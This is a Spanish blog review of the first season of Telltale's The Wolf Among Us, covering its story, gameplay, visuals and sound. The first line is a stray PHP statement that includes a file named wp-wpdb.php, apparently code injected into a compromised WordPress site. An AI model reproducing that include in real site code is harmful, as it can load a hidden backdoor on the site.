if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis The Wolf Among Us, primera temporada – La Fortaleza de LeChuck

Análisis The Wolf Among Us, primera temporada

Después de disfrutar de la impresionante primera temporada de The Walking Dead, y encontrarme casi a las puertas del final de la segunda, aproveché para introducirme en otro de los juegos de Telltale Games que repite el sistema anterior, hablo de The Wolf Among Us, una adaptación de los cómics Fables de Bill Willingham. Bienvenidos a Fabletown, donde los personajes de cuentos clásicos lidian con la rutina de los simples mortales.

The-Wolf-Among-Us

En The Wolf Among Us tomamos el papel de Bigby Wolf, el lobo feroz reencarnado en la figura del sheriff malo que intenta mantener la ley y el orden en la comunidad de fábulas llamada Fabletown, un barrio de mala muerte en el Upper West Side de Nueva York. La tranquila vida de sus residentes se ve salpicada por la muerte de Faith, una prostituta que la noche anterior había tenido un altercado con Woody, el leñador. A partir de aquí, Bigby, con la inestimable ayuda de Snow (Blancanieves), se adentra en una oscura investigación donde descubrirá lo que se esconde detrás de la aparente paz de su comunidad.

La mayor parte del juego se desarrolla a base de diálogos con los personajes, y en escoger los diferentes caminos que se nos abren dependiendo de cómo interactuemos con las otras fábulas y respondamos a sus deseos y necesidades. Como no podía faltar, también tendremos muchísimos quick time events para machacar botones y hacer click en el momento justo para asestar un golpe al enemigo. Hay pocos momentos de exploración o en los que podamos dirigir al personaje, por lo que a la larga se convierte en un juego donde básicamente contestamos preguntas y machacamos teclas, y donde el mayor placer se halla en observar a modo de espectador cómo se desarrolla la historia a través de nuestras decisiones.

The-Wolf-Among-Us-1
¿Qué decidirás?

La historia no es nada del otro jueves salvo por varios giros hacia el final que despiertan de nuevo el interés, pero aún así podríamos resumirla en historia típica con personajes atípicos. Hay un sinfín de clichés de enfrentamientos entre buenos y malos, sin embargo, la gracia del juego reside —como no— en los personajes. Nos relacionaremos con fábulas muy diversas, pero no todas estarán contentas de vernos, nuestra mala fama nos precede así que podremos decidir como enfrentarnos a sus reproches para que nuestra reputación mejore o empeore. Aunque Telltale hace un buen trabajo al exponernos el mundo sombrío de The Wolf Among Us, no pude evitar sentir que la narración era demasiado corta. Una gran cantidad de personajes introducidos podrían haber dado más de sí y son relegados a formar parte del decorado. Bigby y Snow son los que están al mando, la cara visible de la historia, y los que viven los sucesos en primera persona. Ambos desarrollan su personalidad, además de cierta tensión sexual entre ellos.

The-Wolf-Among-Us-2
¡Machaca!

A nivel técnico, The Wolf Among Us representa una ligera mejoría respecto a The Walking Dead, y el estilo visual sigue siendo muy llamativo y creativo. Los gráficos tienen un aspecto cómic que parecen estar literalmente sacados de las páginas de los libros. Los gráficos ayudan a contar la historia, donde el lenguaje corporal de los personajes juega un papel importante, por lo que se ha trabajado para que sin palabras transmitan su estado de ánimo. La animación, excepto por algún ligero error, fluye de forma consistente. Para terminar el conjunto, la banda sonora complementa las imágenes y la trama muy bien, mientras que los efectos de sonido hacen lo que deben hacer. También cabe destacar el doblaje, con actuaciones convincentes de un elenco de actores de voz entregados en sus líneas.

La primera temporada de The Wolf Among Us me ha parecido inconsistente. Mucho potencial que parece haberse ido sin explotar. El título no tiene el mismo impacto emocional de The Walking Dead, pero dispone de misterio y buen ritmo, con una conclusión aceptable y algunos personajes fascinantes aunque poco desarrollados. Se ha anunciado una segunda temporada de The Wolf Among Us que comenzará a finales de año, veremos entonces si se trabajan estos aspectos. The Wolf Among Us continúa con el sistema que tan buenos resultados ha dado a Telltale, por lo que si eres fan de este tipo de juegos, The Wolf Among Us tiene que estar en tu colección.